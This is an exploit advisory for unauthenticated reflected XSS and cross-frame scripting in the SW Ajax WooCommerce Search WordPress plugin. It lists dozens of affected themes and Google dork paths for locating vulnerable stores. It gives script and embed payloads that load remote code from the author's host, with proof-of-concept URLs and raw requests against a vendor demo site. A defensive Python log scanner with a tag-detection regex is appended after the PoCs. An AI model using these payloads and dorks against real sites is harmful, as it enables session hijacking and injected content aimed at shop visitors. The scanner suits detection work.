[+] :: Exploit Title: SW Ajax WooCommerce Search plugin v1.2.6 - Unauthenticated Reflected XSS & XFS
[+] :: Google Dork: inurl:/wp-content/plugins/sw_ajax_woocommerce_search/
[+] :: Date: 2020-10-21
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: MagenTech | WPThemeGo [ https://www.magentech.com | http://www.wpthemego.com ]
[+] :: Software Version: 1.2.6
[+] :: Software Link: https://wpthemego.com/document/documentation-for-sw-ajax-woocommerce-search/
[+] :: Tested on: Kali Linux
[+] :: CVE:
[+] :: CWE: CWE-79, CWE-1021
[i] :: Info:
Unauthenticated Reflected XSS and XFS (cross-frame scripting) vulnerabilities were discovered in the SW Ajax WooCommerce Search plugin v1.2.6 for WordPress. In both cases the search term is reflected into the page without escaping, so an attribute-closing `">` followed by a tag lands in the response markup.
The plugin comes with a number of commercial themes such as: OneMall, Revo, eMarket, Autusin, Market, MaxShop, ShoppyStore, Furnicom, EtroStore, HiTheme, StyleShop, TopDeal, Victo, Avesa, Soaz, Binace, Houskit, Gaion, Furniki, Rozy, SecretSho, BosMarket, Siezz, HiStore, Ecomart, iMarket, NeoMarket, 9Merry, LeVogue, Floris, Alishop, KONStore, ShopyMall, DresShop, Shop4U, FurniHome, Tech8.
[!] :: Affected Themes (from ThemeForest):
OneMall [ https://themeforest.net/item/onemall-the-multipurpose-ecommerce-marketplace-wordpress-theme/20685400 ]
Revo [ https://themeforest.net/item/revo-multipurpose-responsive-woocommerce-theme/18276186 ]
eMarket [ https://themeforest.net/item/emarket-multipurpose-woocommerce-wordpress-theme/20492674 ]
Autusin [ https://themeforest.net/item/autusin-auto-parts-equipments-woocommerce-theme/22681468 ]
Market [ https://themeforest.net/item/market-responsive-woocommerce-wordpress-theme/9514470 ]
MaxShop [ https://themeforest.net/item/maxshop-responsive-wordpress-woocommerce-theme/11452732 ]
ShoppyStore [ https://themeforest.net/item/shoppystore-woocommerce-wordpress-theme/13607293 ]
Furnicom [ https://themeforest.net/item/furnicom-responsive-furniture-woocommerce-wordpress-theme/15548234 ]
EtroStore [ https://themeforest.net/item/etrostore-multipurpose-responsive-woocommerce-wordpress-theme/19250849 ]
HiTheme [ https://themeforest.net/item/hitheme-responsive-woocommerce-wordpress-theme/19618312 ]
StyleShop [ https://themeforest.net/item/styleshop-multipurpose-responsive-woocommerce-theme/19680545 ]
TopDeal [ https://themeforest.net/item/topdeal-responsive-woocommerce-wordpress-theme/20308469 ]
Victo [ https://themeforest.net/item/victo-ecommerce-marketplace-wordpress-theme/20728619 ]
Avesa [ https://themeforest.net/item/avesa-beauty-store-woocommerce-wordpress-theme/25696718 ]
Soaz [ https://themeforest.net/item/soaz-furniture-store-wordpress-woocommerce-theme/23858298 ]
Binace [ https://themeforest.net/item/binace-fashion-shop-wordpress-woocommerce-theme/22953765 ]
Houskit [ https://themeforest.net/item/houskit-interior-design-furniture-store-wordpress-theme/23527677 ]
Gaion [ https://themeforest.net/item/gaion-sport-accessories-shop-wordpress-woocommerce-theme/23068764 ]
Furniki [ https://themeforest.net/item/furniki-furniture-store-interior-design-wordpress-theme/22846033 ]
Rozy [ https://themeforest.net/item/rozy-flower-shop-woocommerce-theme/22640923 ]
SecretSho [ https://themeforest.net/item/secretsho-fashion-marketplace-wordpress-theme/22058416 ]
BosMarket [ https://themeforest.net/item/bosmarket-flexible-multivendor-woocommerce-wordpress-theme/21207492 ]
Siezz [ https://themeforest.net/item/siezz-modern-multipurpose-marketplace-wordpress-theme/21204130 ]
HiStore [ https://themeforest.net/item/histore-clean-ecommerce-marketplace-wordpress-theme/20906824 ]
[!] :: Affected Themes (from WPThemeGo):
iMarket [ https://wpthemego.com/item/imarket-creative-gift-shop-woocommerce-wordpress-theme/ ]
NeoMarket [ https://wpthemego.com/item/neomarket-modern-multi-vendor-woocommerce-wordpress-theme/ ]
EcoMart [ https://wpthemego.com/item/ecomart-organic-food-store-woocommerce-wordpress-theme/ ]
9Merry [ https://wpthemego.com/item/9merry-christmas-gifts-woocommerce-wordpress-theme/ ]
LeVogue [ https://wpthemego.com/item/levogue-fashion-shop-woocommerce-wordpress-theme/ ]
Floris [ https://wpthemego.com/item/floris-flower-shop-woocommerce-wordpress-theme/ ]
Alishop [ https://wpthemego.com/item/alishop-responsive-woocommerce-wordpress-theme/ ]
KONStore [ https://wpthemego.com/item/konstore-bridal-shop-woocommerce-wordpress-theme/ ]
ShopyMall [ https://wpthemego.com/item/shopymall-multi-vendor-marketplace-woocommerce-wordpress-theme/ ]
DresShop [ https://wpthemego.com/item/dresshop-fashion-shop-woocommerce-wordpress-theme/ ]
Shop4U [ https://wpthemego.com/item/shop4u-modern-marketplace-woocommerce-wordpress-theme/ ]
FurniHome [ https://wpthemego.com/item/furnihome-furniture-store-woocommerce-wordpress-theme/ ]
Tech8 [ https://wpthemego.com/item/tech8-digital-store-woocommerce-wordpress-theme/ ]
[%] :: Google Dorks:
/wp-content/themes/onemall/
/wp-content/themes/revo/
/wp-content/themes/emarket/
/wp-content/themes/autusin/
/wp-content/themes/market/
/wp-content/themes/maxshop/
/wp-content/themes/shoppystore/
/wp-content/themes/furnicom/
/wp-content/themes/etrostore/
/wp-content/themes/hitheme/
/wp-content/themes/styleshop/
/wp-content/themes/topdeal/
/wp-content/themes/victo/
/wp-content/themes/avesa/
/wp-content/themes/soaz/
/wp-content/themes/binace/
/wp-content/themes/houskit/
/wp-content/themes/gaion/
/wp-content/themes/furniki/
/wp-content/themes/rozy/
/wp-content/themes/secretsho/
/wp-content/themes/bosmarket/
/wp-content/themes/siezz/
/wp-content/themes/histore/
/wp-content/themes/ecomart/
/wp-content/themes/imarket/
/wp-content/themes/neomarket/
/wp-content/themes/9merry/
/wp-content/themes/levogue/
/wp-content/themes/floris/
/wp-content/themes/alishop/
/wp-content/themes/konstore/
/wp-content/themes/shopymall/
/wp-content/themes/dresshop/
/wp-content/themes/shop4u/
/wp-content/themes/furnihome/
/wp-content/themes/tech8/
[$] :: Payloads:
"><script src="https://ex-mi.ru/payload/a2r.js"></script>
"><embed src="https://ex-mi.ru/payload/xfsii.html">
[!] :: PoC Unauthenticated Reflected XSS:
https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product
[!] :: PoC Unauthenticated Reflected XSS (Burp Suite):
GET /themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1
Host: demo.wpthemego.com
[!] :: PoC Unauthenticated XFS:
https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E&search_posttype=product
[!] :: PoC Unauthenticated XFS (Burp Suite):
GET /themes/sw_onemall/layout2/wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E HTTP/1.1
Host: demo.wpthemego.com
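Added example, not part of the advisory or of the plugin's code: a Python access-log scanner that flags attempts against the two reflected inputs shown above, the theme search form's `s` parameter and the `query` parameter of the `sw_search_products_callback` admin-ajax action. The sample log lines, the host example.invalid and the tag regex are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory identifies as reflected without escaping.
REFLECTED_PARAMS = ("s", "query")
# admin-ajax action named in the XFS PoC; reachable without authentication.
AJAX_ACTION = "sw_search_products_callback"
# Tag-injection markers: a quote-and-close-bracket break followed by a new tag,
# or an opening script/embed/iframe/object/svg/img tag anywhere in the value.
TAG_RE = re.compile(r'<\s*/?\s*(script|embed|iframe|object|svg|img)\b|"\s*>\s*<', re.I)
# Request field of an Apache/nginx combined-format log line.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample traffic (not real logs); payload host is a placeholder.
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Oct/2020:10:00:01 +0000] "GET /?s=blue+shoes&search_posttype=product HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Oct/2020:10:00:02 +0000] "GET /?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fexample.invalid%2Fa.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1" 200 5300 "-" "curl/7.72"',
    '203.0.113.7 - - [21/Oct/2020:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fexample.invalid%2Fx.html%3E HTTP/1.1" 200 800 "-" "curl/7.72"',
]


def inspect_request(target):
    """Return a finding dict if a reflected parameter carries a tag payload, else None."""
    parts = urlsplit(target)
    # parse_qs percent-decodes values and turns '+' into spaces, so the check
    # runs on what the server actually reflects, not on the encoded form.
    params = parse_qs(parts.query, keep_blank_values=True)
    action = params.get("action", [""])[0]
    hits = [(name, value)
            for name in REFLECTED_PARAMS
            for value in params.get(name, [])
            if TAG_RE.search(value)]
    if not hits:
        return None
    return {
        "path": parts.path,
        "ajax_action": action,
        "params": hits,
        # Hits on the unauthenticated ajax endpoint are the higher-confidence signal.
        "severity": "high" if action == AJAX_ACTION else "medium",
    }


def scan_log(lines):
    """Yield (line_number, finding) for every log line carrying a payload."""
    for n, line in enumerate(lines, 1):
        m = REQ_RE.search(line)
        if m:
            finding = inspect_request(m.group("target"))
            if finding:
                yield n, finding


if __name__ == "__main__":
    for n, f in scan_log(SAMPLE_LOG):
        print(n, f["severity"], f["path"], f["params"])
```

Lines 2 and 3 of the sample are reported; the benign search on line 1 is not, since a plain term never contains a tag or a `">` break.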
[@] :: Contacts:
Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex.mi